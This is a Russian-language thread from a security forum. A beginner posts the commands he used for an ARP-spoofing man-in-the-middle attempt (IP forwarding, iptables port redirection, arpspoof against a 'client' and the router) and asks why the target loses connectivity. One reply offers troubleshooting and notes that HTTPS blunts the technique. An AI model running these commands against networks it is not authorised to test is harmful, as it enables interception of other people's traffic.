• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Проблема с arpspoof

W

watersquad

Member
14.05.2020
8
0
Добрый вечер!

Недавно стал изучать тему хакинга, вот пытался сделать спуфинг

echo 1 > /proc/sys/net/ipv4/ip_forward (включил IP форвардинг на хосте, чтобы трафик уходил)

iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT (открыл порт)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 (настройл firewall для редиректа портов)

Запустил arpspoof

arpspoof -i en0 -t 192.168.0.103("клиент") -r 192.168.0.1(роутер)

arpspoof -i en0 -t 192.168.0.1(роутер) -r 192.168.0.103("клиент")

И все, интернет соедиение на комьютере "клиента" пропадает, ПОЧЕМУ?

Сразу скажу, я только вливаюсь в изучение темы, имею большое желание многому научится, крайне прошу помочь и не агрится на меня или мой вопрос.

Спасибо и хорошего всем дня!
 
Сортировать по дате Сортировать по голосам
ооочень знакомо. натыкался на подобную проблему, пытался что-то по этому поводу узнать. я так понял эта фишка настолько старая, что пофикшена везде. подмена пакетов идет, но не доходит до браузера. браузер уже все это дело видит.
по твоей проблеме: во первых ты проверял ип адрес "жерты"? если ты все правильно сделал он должен был измениться. если изменился, нужно попробовать пингануть google.com если пакеты идут, значит все ты верно настроил.
PS сейчас все ресурсы имеют сертификаты, пусть и самоподписаные, но имеют. чтобы извлечь профит нужно копать другую сферу.
 
За 0 Против
s unity сказал(а):
ооочень знакомо. натыкался на подобную проблему, пытался что-то по этому поводу узнать. я так понял эта фишка настолько старая, что пофикшена везде. подмена пакетов идет, но не доходит до браузера. браузер уже все это дело видит.
по твоей проблеме: во первых ты проверял ип адрес "жерты"? если ты все правильно сделал он должен был измениться. если изменился, нужно попробовать пингануть google.com если пакеты идут, значит все ты верно настроил.
PS сейчас все ресурсы имеют сертификаты, пусть и самоподписаные, но имеют. чтобы извлечь профит нужно копать другую сферу.
Нажмите, чтобы раскрыть...
Просто только начал все это изучать, да я понимаю, что везде уже https стоит, просто хотел разобраться

Просто к слову, если не трудно, могли бы вы посоветовать материалов на тему сетевых и веб атак? Был бы крайне рад с:
 
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

N
  • Статья Статья
Статья SQL DB как песочница для новичка: учимся скрывать данные и понимать логику ИБ
Ответы
2
Просмотры
2 тыс.
Статьи и новости кибербезопасности
Сергей Попов
Сергей Попов
K
  • Вопрос Вопрос
Проблема с sslstrip, arpspoof
Ответы
6
Просмотры
3 тыс.
Вопросы и Ответы по ИБ (Q&A)
kalixx
K
S
  • Вопрос Вопрос
burpSuite proxy+arpspoof - не работает полностью.
Ответы
5
Просмотры
2 тыс.
Вопросы и Ответы по ИБ (Q&A)
Crazy Jack
Crazy Jack
Strife
  • Статья Статья
Статья Фильтрация трафика (IPT, NAT, DMZ)
Ответы
2
Просмотры
8 тыс.
Статьи и новости кибербезопасности
kamanchi
kamanchi
Верх Низ